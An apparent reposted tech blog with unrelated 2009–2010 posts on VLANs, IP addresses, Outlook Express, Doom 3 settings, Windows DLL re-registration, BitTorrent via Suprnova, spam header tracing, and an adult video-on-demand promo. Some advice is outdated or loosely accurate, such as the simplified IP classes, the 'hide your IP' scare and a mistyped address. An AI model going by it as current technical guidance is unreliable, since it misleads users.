The key is finding ways to make podcasts engaging, and effective. Right now businesses are using podcasting as a marketing tool to attract clients in much the same way that blogs lead to exposure for other businesses. There is no reason that podcasts can't generate revenue. For example if you host a show on llama herding, it's possible (although not probable) that 2,000 llama herding enthusiasts might subscribe. If you have a large niche marketing then advertising might work for you. Who's to say that if an enterprising podcaster rounded up an audience of 7,000 listeners interested in basket weaving, then why wouldn't a basket weaving company want to advertise to that audience? The key is finding a podcast with quality content and advertisers who need to reach that specific audience. What is needed essentially is a matchmaker of sorts to help the shows and advertisers find one another.

The other problem is getting web users to find and subscribe to podcasts. While it may seem like just about everyone knows about podcasting the truth is that there is a good majority of people who still haven't. In an interview last year Yahoo Chief Products Officer Geoff Ralston pointed this particular problem out. "…the fact is that what we really want to do at Yahoo is to bring podcasting to the mainstream, and for that to happen people have to learn about it. So we've created a site where it's really easy to learn about it, and like I said, you'll be able to find podcasts eventually everywhere on Yahoo. So as you're reading your news, which of course many millions of people do every day week, and month on Yahoo, you will start to be introduced to podcasts and start to be introduced to the podcast experience of the site and that will actually start to bring you into the community of podcasters. And it is a community! One of the key aspects of Yahoo Podcasts is that the community is what gives it strength and gives the feeling of the site. The site also allows people to rate podcasts to create the ability for people to find the podcasts that matter."

Podcasting is still a new medium and so there's plenty of room for growth and change. The real key to making money with podcasting is finding a way to use traditional methods of generating revenue along side newer methods. The key in a young industry, like podcasting, is experimenting with different methods, not being afraid to adapt new business models, or even inventing your own. So Ricky Gervais may have an easier time making money at it, but that's not to say that it's impossible for anyone else.

Potential customers are looking for you through search engines, directories and forums. We help them find your website. How? Check out our marketing techniques at http://www.itsontarget.com and sign up for our podcast and we'll let you in on some interesting internet traffic solutions.

Cisco CCNP - BCMSN Exam Tutorial: Static VLANs

2010-08-27T00:24:00.000-05:00

BCMSN exam success and earning your CCNP certification requires you to add to your knowledge of VLAN configuration. When you studied for your CCNA exam, you learned how to place ports into a VLAN and what the purpose of VLANs was, but you may not be aware that there are two types of VLAN membership. To pass the BCMSN exam, you must know the details of both types.

In this tutorial, we'll take a look at the VLAN type you are most familiar with, the "static VLAN". As you know, VLANs are a great way to create smaller broadcast domains in your network. Host devices connected to a port belonging to one VLAN will receive broadcasts and multicasts only if they were originated by another host in that same VLAN. The drawback is that without the help of a Layer 3 switch or a router, inter-VLAN communication cannot occur.

The actual configuration of a static VLAN is simple enough. In this example, by placing switch ports 0/1 and 0/2 into VLAN 12, the only broadcasts and multicasts hosts connected to those ports will receive are the ones transmitted by ports in VLAN 12.

SW1(config)#int fast 0/1

SW1(config-if)#switchport mode access

SW1(config-if)#switchport access vlan 12

% Access VLAN does not exist. Creating vlan 12

SW1(config-if)#int fast 0/2

SW1(config-if)#switchport mode access

SW1(config-if)#switchport access vlan 12

One of the many things I love about Cisco switches and routers is that if you have forgotten to do something, the Cisco device is generally going to remind you or in this case actually do it for you. I placed port 0/1 into a VLAN that did not yet exist, so the switch created it for me!

There are two commands needed to place a port into a VLAN. By default, these ports are running in dynamic desirable trunking mode, meaning that the port is actively attempting to form a trunk with a remote switch in order to send traffic between the two switches. The problem is that a trunk port belongs to all VLANs by default, and we want to put this port into a single VLAN only. To do so, we run the switchport mode access command to make the port an access port, and access ports belong to one and only one VLAN. After doing that, we placed the port into VLAN 12 with the switchport access vlan 12 command. Running the switchport mode access command effectively turns trunking off on that port.

The hosts are unaware of VLANs; they simply assume the VLAN membership of the port they're connected to. But that's not quite the case with dynamic VLANs, which we'll examine in the next part of this BCMSN tutorial.

There's no mystery in the IP address!

2010-08-26T00:45:00.002-05:00

The Computer is a very complicated device we use for our every day comfort and the importance of some of its numerical aspects is sometimes neglected. For example: a different number is given to each computer when its user goes online or when it is part of a network. This number is the IP address and knowing about it is like knowing where you live…

What's my IP and what do its numbers stand for?

IP stands for Internet Protocol and the address is formed from 4 numbers separated by periods. The IP address format is a 32 bit numeric one and each number can be from 0 to 255. The IP address consists of two parts: first one represent the network number and it is similar for more than one user (like the number of a street) and second represents the host name which is different for each user (like the house number). To increase the number of available IP addresses within big networks with a lot of users or small networks with few hosts, the address is divided into 4 classes (A, B, C, and D)

Having an IP address it's like having a last name in a network. To identify a computer in a network (LAN-local area network, WAN-wide area network or on the Internet) it has to have an IP address. This number is similar to a phone number or to a zip code. It is unique and without it the device or computer can not be used in a network area. Within an isolated network the computers can be assigned different random IP addresses, but if a private network needs to be connected to the Internet the IP has to be registered so that its uniqueness is verified

Where do I find my IP address?

Connect to a site that recognizes your IP address and let you see it also. You can visit this site for example: iprelated.com. These IP Lookup sites are very easy to use and very useful for others. An IP address can offer a lot information about the person who logs in on the Internet and engages in a certain activity.

This is how illegal activity is sometimes detected and violations are reported. The IP address says less about the user if it is a dynamic one because it changes every time the user logs in.

Another interesting aspect is that some people who have the information from your IP address are interested in taking you computer over and using its resources. This is not impossible! They can use software that enables them to do this so it is better to hide your IP when you are online.

Who gives me my IP address?

The IP address can be static or dynamic, meaning it can be the same every time you are online or it can change. The IP address is provided by a server through a service called DHCP (Dynamic Host Configuration Protocol)

Although things can get pretty complicated when explaining numbers and their significance, this is just a small and easy to understand introduction about the IP address that does not involve technical terms. The importance of these details is very high because starting from these brief explanations one can truly comprehend the necessity and implications of the IP address and of virtual geo location.

Video On Demand Adult Films

2010-08-26T00:43:00.002-05:00

Certain groups in society have attached a negative stigma to pornography which has made people feel guilty about enjoying it. Sexuality is a very natural process and should be welcomed by people, not shunned. It is unclear when exactly sexuality began being viewed as something that should be hidden and ticked away, but we do know that some people still view it this way. Video on demand adult films encourages people to be comfortable with their sexuality and to explore their bodies. The best part about video on demand is that you can stay in your own home and have a feeling of privacy while you experiment.

Video on demand adult films are a great thing to put on your computer or television as you are warming up and preparing for an intimate experience, whether it be by yourself or with your partner. If you are thinking about having a sexual experience that may be making you nervous or tense, then ordering a video on demand adult movie is a good way to relax. Often times, when a partner wants to have sexual intercourse for the first time or anal sex; it creates a lot of unnecessary stress and nerves. This would be a perfect time to have something to help them out, a way to relax and be confident with their body and sexuality.

This is why video on demand is so popular; it gives people that sense of freedom that they cannot find with anything else. When you feel you cannot talk to anyone about it or that it may be too personal to share, this is a perfect thing to be able to turn to for help. Not everyone is sexually adventurous, but with a video on demand adult film you can live the sensual lifestyle that you never thought was possible.

Fiber Optics In The Real World

2010-08-26T00:23:00.000-05:00

Arthroscopy (pronounced ahr-THROS-kuh-pee) is a technique of using another medical instrument called the Arthroscope. This instrument is straight and cylinder-like with a series of lenses and optic fiber bundles that come in sizes of 1/12 to 1/5 inch (2 to 5 millimeters.) The Arthroscope is used to examine a joint in a body, such as knee joints, ankles, elbows, hips and shoulders. This is done by the Arthroscope being inserted into a joint of the body through a small incision. A light is then transmitted by the use of the optic fibers to the tip of the Arthroscope to illuminate the joint. The use of optic fiber through the Arthroscope enables a physician to thoroughly examine a joint for diagnosis or treatment.

Optic fibers used in the Arthroscope can be used to measure temperature and other bodily

attributes as well as being used in performing surgical procedures. The problem most commonly treated by Arthroscopy is torn cartilage in the knee. This is when a small incision is made at the joint for use of the optic fiber in the Arthroscope and then a second incision is made for the use of other surgical instruments to remove the cartilage. The primary advantage of using optic fibers through Arthroscopic surgery is that the operation can be performed through a small incision, resulting in the patient experiencing the least amount of discomfort and a healing time that is much shorter, when compared to the other methods of surgery.

Aside from the uses of the Endoscopes and the Arthroscopes, another widely used function of optic fibers in the medical field is the ability for the optical fibers to be inserted into blood vessels to give a quick and accurate analysis of blood chemistry. Physicians have also found medical use of the optical fibers to direct intense laser light at a wound to stop bleeding or to burn away abnormal tissue. Fiber optic training is necessary in the field of medicine. The use of optic fiber through medical science continues to grow rapidly to everyday to develop more new and advanced medical devices to enable physicians to provide people with better service.

Best Web Hosting - How Can It Affect Your Business

2010-07-30T23:41:00.000-05:00

With the best web hosting provider at your side, you are simply welcoming a package that can compete with the current trend and needs of any business in our current generation. It might give you an ease in increasing your business's productivity but finding the best web hosting company can really be challenging.

It is quite apparent that numerous companies offers different web hosting packages that choosing one among the millions of provider is truly overwhelming. You may be thinking that you can go for any company and there is no need to invest for the best web hosting provider but truth is, choosing the best web hosting company deserves tons of consideration as it can greatly increase and generate revenue for your business thus, settling for a mediocre web hosting provider would give you a mediocre result.

Especially for businesses that relies their productivity mainly on their website as the power of your website could make or break your business. It is not advisable that you settle for a web hosting company that suits your current needs. Going for one would limit the future of your business since as your business expands and grow, your demands for your web hosting provider would increase as well. It is not ideal that you start with a provider that can handle your current needs then switch to the best one afterwards as it would cost you more money and more time that might hinder your business's growth.

In order for you to end up with the best web hosting provider, you would have to consider some crucial factors when searching for one. The basic factor that should be on top of your list is reliability. The best web hosting company should bear minimal to no downtime period since when your host is down then your website is down as well, which means that your business online is closed. Therefore, it is important that you make a brief research about your desired company's background or history regarding their reliability in the years that they have been on the business.

Other critical factors would be the space or capacity that the company provides availability for upgrades or expansions, security for your confidential records and what-have-you, the connection speed or efficiency for receiving and sending files of your provider and providing reports for the status of your website. The best web hosting providers are those that keep backups and provide outstanding technical support. If these factors are present on the web host company that you are eyeing for, then you might just made the first step in making your business successful.

How to Set POP 3 EMAIL on Outlook Express

2010-04-20T05:02:00.002-05:00

The Internet Connection Wizard makes short work of setting up your online mailbox by walking you through each step for every e-mail account you set up.

1. Before you get going, make sure you know your email address along with the following information. (You may need to contact your ISP, Internet Service Provider, to get it.)

First, information about the e-mail servers:
• The type of e-mail server you use: POP3 (most e-mail accounts), HTTP (such as Hotmail), or IMAP
• The name of the incoming e-mail server
• For POP3 and IMAP servers, the name of the outgoing e-mail server (generally SMTP)

Second, information about your account:
• Your account name and password

(For some solid advice about making a secure password, read the Create strong passwords article.)

• Find out if your ISP requires you to use Secure Password Authentication (SPA) to access your e-mail account—yes or no is all that's required.

2. Start Outlook Express, and on the Tools menu, click Accounts.

If the Internet Connection Wizard starts up automatically, skip ahead to step 4.

3. Click Add, and then click Mail to open the Internet Connection Wizard.
Mail option from the Add button

Mail option from the Add button

4. On the Your Name page of the wizard, type your name as you want it to appear to everyone who gets e-mail from you, and then click Next.

Most people use their full name, but you can use any name—even a nickname—that people will recognize.

5. On the Internet Explorer Address page, type your e-mail address, and then click Next.

6. On the E-mail Server Names page, fill in the first block of information that you gathered from your ISP in step 1, and then click Next. Internet Connection Wizard's E-mail Server Names

Note: If you chose HTTP as your incoming e-mail server—as for a Hotmail or MSN account—this wizard page changes slightly so you can identify your HTTP mail service provider.

7. On the Internet Mail Logon page, type your account name and password.
Internet Connection Wizard's Internet Mail Logon

Note: If you're concerned about break-ins to your e-mail, click to clear the check in the Remember Password box. You'll then be prompted for the password each time you send or retrieve mail.

8. Click Next, and then click Finish.

You're ready to send your first e-mail!

Tips : Unsure if your new e-mail account is working? Send an e-mail message to a friend. If they get the message, your account is ready to roll! But if you run into problems setting up your account, Outlook Express offers help. Search for troubleshooting topics from Contents and Index on the Help menu.

how to run doom with tweeks

2009-07-21T22:04:00.000-05:00

Ok I am running Amd Athlon 1800 1.15 GHz 384 ram With a Gforce2
when I installed the game and attempted to play I got a whopping 2 fps to 4 fps to see what your FPS are put this in consol com_showFPS "1" or set com_showFPS "1" in config file
After I change some in game settings like
600x800 and low quality
Advance setting: I have High Quality Special affect checked yes and Enable Bump maps Yes all the rest are checked no.
After I did these things I am getting average of 21 fps to 35 fps and in high action areas they drop to 15 FPS
so this is what I did to my DoomConfig.
seta image_downSizeLimit "512" CHANGED THIS FROM 256
seta image_downSizeBumpLimit "512" CHANGED THIS FROM 256

Here is actual config just make a back up of your config and copy and paste. Try mine if you have an old Graphix card.

// IvL/FblnaU4w6bO89mN9XIzJKwdEz1acOB3LQ6Vj2NWPrRjcMHDUWwpZzE/zePncK8JfwT1h1fHq+5XRCsM=
unbindall
bind "TAB" "_impulse19"
bind "ENTER" "_button2"
bind "ESCAPE" "togglemenu"
bind "/" "_impulse14"
bind "0" "_impulse10"
bind "1" "_impulse0"
bind "2" "_impulse1"
bind "3" "_impulse2"
bind "4" "_impulse3"
bind "5" "_impulse4"
bind "6" "_impulse5"
bind "7" "_impulse6"
bind "8" "_impulse7"
bind "9" "_impulse8"
bind "[" "_impulse15"
bind "\\" "_mlook"
bind "]" "_impulse14"
bind "a" "_moveleft"
bind "c" "_movedown"
bind "d" "_moveright"
bind "f" "_impulse11"
bind "q" "_impulse9"
bind "r" "_impulse13"
bind "t" "clientMessageMode"
bind "y" "clientMessageMode 1"
bind "z" "_zoom"
bind "BACKSPACE" "clientDropWeapon"
bind "PAUSE" "pause"
bind "UPARROW" "_forward"
bind "DOWNARROW" "_back"
bind "LEFTARROW" "_moveLeft"
bind "RIGHTARROW" "_moveRight"
bind "ALT" "_strafe"
bind "CTRL" "_moveDown"
bind "SHIFT" "_forward"
bind "DEL" "_lookdown"
bind "PGDN" "_lookup"
bind "END" "_impulse18"
bind "F1" "_impulse28"
bind "F2" "_impulse29"
bind "F3" "_impulse17"
bind "F5" "savegame quick"
bind "F6" "_impulse20"
bind "F7" "_impulse22"
bind "F9" "loadgame quick"
bind "F12" "screenshot"
bind "KP_LEFTARROW" "_moveUp"
bind "KP_END" "_speed"
bind "KP_INS" "_impulse13"
bind "MOUSE1" "_attack"
bind "MOUSE3" "_zoom"
bind "MWHEELDOWN" "_impulse14"
bind "MWHEELUP" "_impulse15"
seta radiant_entityMode "0"
seta gui_mediumFontLimit "0.60"
seta gui_smallFontLimit "0.30"
seta net_socksPassword ""
seta net_socksUsername ""
seta net_socksPort "1080"
seta net_socksServer ""
seta net_socksEnabled "0"
seta win_ypos "22"
seta win_xpos "3"
seta sys_lang "english"
seta s_numberOfSpeakers "2"
seta s_doorDistanceAdd "150"
seta s_globalFraction "0.8"
seta s_subFraction "0.75"
seta s_playDefaultSound "1"
seta s_volume_dB "0"
seta s_meterTopTime "2000"
seta s_reverse "0"
seta s_spatializationDecay "2"
seta s_maxSoundsPerShader "1"
seta r_debugArrowStep "120"
seta r_debugLineWidth "1"
seta r_debugLineDepthTest "0"
seta r_cgFragmentProfile "best"
seta r_cgVertexProfile "best"
seta r_forceLoadImages "1"
seta r_shadows "0"
seta r_skipBump "0"
seta r_skipSpecular "1"
seta r_skipNewAmbient "0"
seta r_renderer "best"
seta r_brightness "1.595238"
seta r_gamma "1.3"
seta r_swapInterval "0"
seta r_useIndexBuffers "0"
seta r_customHeight "486"
seta r_customWidth "720"
seta r_fullscreen "1"
seta r_mode "4"
seta r_multiSamples "0"
seta image_downSizeLimit "512"
seta image_ignoreHighQuality "1"
seta image_downSizeBumpLimit "512"
seta image_downSizeSpecularLimit "64"
seta image_downSizeBump "1"
seta image_downSizeSpecular "1"
seta image_useCache "1"
seta image_cacheMegs "128"
seta image_cacheMinK "10240"
seta image_usePrecompressedTextures "1"
seta image_useNormalCompression "1"
seta image_useAllFormats "1"
seta image_useCompression "1"
seta image_roundDown "1"
seta image_forceDownSize "0"
seta image_downSize "1"
seta image_lodbias "0"
seta image_anisotropy "0"
seta image_filter "GL_LINEAR_MIPMAP_LINEAR"
seta gui_filter_gameType "0"
seta gui_filter_players "0"
seta gui_filter_password "0"
seta net_master4 ""
seta net_master3 ""
seta net_master2 ""
seta net_master1 ""
seta net_clientMaxRate "16000"
seta net_serverMaxClientRate "16000"
seta m_strafeSmooth "4"
seta m_smooth "1"
seta m_strafeScale "6.25"
seta m_yaw "0.022"
seta m_pitch "0.022"
seta sensitivity "5"
seta in_alwaysRun "0"
seta in_freeLook "1"
seta in_anglespeedkey "1.5"
seta in_pitchspeed "140"
seta in_yawspeed "140"
seta gui_configServerRate "0"
seta com_guid ""
seta com_showFPS "1"
seta com_purgeAll "1"
seta com_machineSpec "0"
seta g_decals "0"
seta g_projectileLights "0"
seta g_doubleVision "0"
seta g_muzzleFlash "0"
seta mod_validSkins "skins/characters/player/marine_mp;skins/characters/player/marine_mp_green;skins/characters/player/marine_mp_blue;skins/characters/player/marine_mp_red;skins/characters/player/marine_mp_yellow"
seta g_mapCycle "mapcycle"
seta g_voteFlags "0"
seta g_gameReviewPause "10"
seta g_countDown "10"
seta g_password ""
seta g_showBrass "1"
seta g_showProjectilePct "0"
seta g_showHud "1"
seta g_showPlayerShadow "0"
seta g_showcamerainfo "0"
seta g_healthTakeLimit "25"
seta g_healthTakeAmt "5"
seta g_healthTakeTime "5"
seta g_useDynamicProtection "1"
seta g_armorProtectionMP "0.6"
seta g_armorProtection "0.3"
seta g_damageScale "1"
seta g_nightmare "0"
seta g_bloodEffects "1"
seta ui_showGun "1"
seta ui_autoReload "1"
seta ui_autoSwitch "1"
seta ui_team "Blue"
seta ui_skin "skins/characters/player/marine_mp"
seta ui_name "Player"
seta si_spectators "1"
seta si_usePass "0"
seta si_warmup "0"
seta si_teamDamage "0"
seta si_timeLimit "10"
seta si_fragLimit "10"
seta si_maxPlayers "4"
seta si_map "game/mp/d3dm1"
seta si_gameType "singleplayer"
seta si_name "DOOM Server"
seta g_spectatorChat "0"

After I that game runs at bearable frame rate and I must say this is a beautful game! Hope this helps some one Sorry if I put this post in wrong spot did not see game support. Thank you for the quick reply of misplacement

Can't See Secure Sites

2009-07-21T22:02:00.000-05:00

Fix the problem with seeing them secrue sites (banks or online stores) i found this very usefull to me at my work (isp backbone support lol, at the time i was regular support )

Any way... what u need to do is make a new notepad file and write in it the followng DLL's.. just copy-paste these

regsvr32 SOFTPUB.DLL
regsvr32 WINTRUST.DLL
regsvr32 INITPKI.DLL
regsvr32 dssenh.dll
regsvr32 Rsaenh.dll
regsvr32 gpkcsp.dll
regsvr32 sccbase.dll
regsvr32 slbcsp.dll
regsvr32 Cryptdlg.dll

and save it as > all file types, and make it something like securefix.bat.

then just run the file and ur problem shuld be gone.

Downloading Windows Media Streams

2009-07-01T18:30:00.000-05:00

Look for the video source url in the webpage source code and copy it:
user posted image
To view the source code, r-click on the webpage that plays the video and select "view source." If unable to do so, just close the window and in the main Internet Explorer (IE) window, click the History icon or press Ctrl+H. Look for the same webpage on the left pane. On the menu, click View > View source.

Paste the video source url in Windows Media Player. (File > Open URL... )
Let the video play now. When the correct title appears on the playlist pane, r-click on it and select "Properties."
Select the source url and copy it:
Paste this url in Flashget to download the video clip.

Bit Torrent Tutorials

2009-05-14T21:49:00.000-05:00

The first things you need to know about using Bit Torrent:
-- Bit Torrent is aimed at broadband users (or any connection better than dialup).
-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.
-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later)
-- The method of downloading is not your conventional type of download. Since downloads do not come in as one
big chunk, you are able to download from many people at once, increasing your download speeds. There may be
100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb)
-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly
share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).

In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.

Which BT client you use, is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there, is that they are extremely CPU intensive, usually using 100% of your cpu power during the whole process. This is the number one reason I use Azureus. Another, is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).

Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self explanitory, its the date the torrent was added.
Name: Also self explanitory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html
Next, get Azureus at: /http://azureus.sourceforge.net
Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

Backtracking EMAIL Messages

2009-05-08T17:42:00.001-05:00

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.

Return-Path:

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for ; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID:

From: "Maricela Paulson"

Reply-To: "Maricela Paulson"

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.

Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)

12.0.0.0 - 12.255.255.255

Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)

12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15

# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost

Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com

Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

source: Twisted Evil

How To Stop Spam

2009-04-24T12:28:00.002-05:00

Change Mcft to microsoft

HOW TO STOP SPAM VIA WINDOWS MESSENGER SERVICE
Below you'll find many ways (sorted in the most successful ratio first) to stop the Windows Messenger service, depending on your system environment, some may require more than one process. This service is available only on NT, 2K, XP & Server 2003. Administrator Login is REQUIRED

About The Messenger Service

* Messenger is a Windows Service that runs in the background
* Messenger is not the same as MSN Messenger or any other Instant Messaging Program
* Messenger does not facilitate two-way chatting
* Many Windows Programs, Firewalls, UPS and Antiviruses require the Messenger Service
* Antivirus and UPS software, among others, may not work if Messenger is disabled
* The Messenger Service is usually turned on by default in most Windows NT, 2K and XP systems

1. Manually

1. Example 1

1. Click Start, Run and enter the following command:
RunDll32 advpack.dll,LaunchINFSection %windir%\inf\msmsgs.inf,BLC.Remove
NOTE: This will prevent a long delay when opening Outlook Express if you have the Contacts pane enabled
2. To prevent this, click Start, Run and enter {REGEDIT} Go to:
HKEY_LOCAL_MACHINE\Software\Mcft\Outlook Express
3. Right click in the right pane and select New, Dword value
4. Give it the name Hide Messenger Double click this new entry and set the value to 2
5. End result should look EXACTLY like this:
System Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Outlook Express]
Value Name: Hide Messenger
Data Type: REG_DWORD (DWORD Value)
Value Data: (2 = remove messenger)

2. Example 2

1. Copy and paste the following to Run Command Bar in the Start Menu:
RunDll32.exe advpack.dll,LaunchINFSection
%windir%\inf\msmsgs.inf,BLC.Remove

3. Example 3

1. If Example 5 didn't work, then try this - Many users miss or don't know of it
2. Click on Start then go to RUN and type:
C:\WINDOWS\inf\sysoc.inf
3. Change:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
4. To:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7
5. Then use Add/Remove Windows Components to remove Messenger
NOTE: You can also prevent access to Windows Messenger using Group Policy or the Set Program Access and Defaults utility added by default in Windows XP SP1 and Windows 2000 SP3

4. Example 4

1. Open Windows Messenger
2. From the menu, select "Tools" then "Options" then "Preferences" tab
3. Uncheck "Run this program when Windows starts"
4. Open Outlook Express
5. From the menu, select "Tools" then "Options" then "General" tab
6. Uncheck the option to "Automatically log on", if it's there
7. Also in Outlook Express, select "View" then "Layout"
8. Uncheck the option to "display Contacts" - The program will open a connection and display a list of all Contacts on line if you do not
9. In "Startup Folder" make sure there is no entry there for Messenger
10. Open Norton Anti-Virus if you have it installed
11. Click "Options" then "Instant Messenger"
12. Unckeck "Windows Messenger (recommended"
NOTE: This list ought to work in disassociate MSN from Outlook Express, so that it'll only start up if you really want it to

5. Example 5

1. 2000

* Click Start-> Settings-> Control Panel-> Administrative Tools->Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties
* Click the STOP button
* Select Disable in the Startup Type scroll bar
* Click OK

2. XP Home

* Click Start->Settings ->Control Panel
* Click Performance and Maintenance
* Click Administrative Tools
* Double click Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties
* Click the STOP button
* Select Disable in the Startup Type scroll bar
* Click OK

3. XP Professional

* Click Start->Settings ->Control Panel
* Click Administrative Tools
* Click Services
* Double click Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties.
* Click the STOP button.
* Select Disable in the Startup Type scroll bar
* Click OK

4. Windows NT

* Click Start ->Control Panel
* Double Click Administrative Tools
* Select Services-> Double-click on Messenger
* In the Messenger Properties window, select Stop
* Then choose Disable as the Startup Type
* Click OK
NOTE: If you stop the service and don’t adjust the startup type, the Messenger service will start automatically the next time you reboot. Keep in mind that when you disable the Messenger service, you'll no longer receive messages about an attached UPS, and you won’t be notified of print job completion, performance alerts, or antivirus activity (from Windows) not the program you're using for those purposes.

6. Example 6

1. To disable receipt of messenger pop-ups, verify that your firewall disables inbound traffic on UDP ports 135, 137, and 138, and TCP ports 135 and 139. On a system connected directly to the Internet, you should also disable inbound traffic on TCP port 445. If the system you want to protect is part of a Win2K-based network with Active Directory (AD), don't block incoming traffic on port 445 - Mcft Knowledge Base Article - 330904
Code:
http://support.Mcft.com/default.aspx?scid=kb;en-us;330904

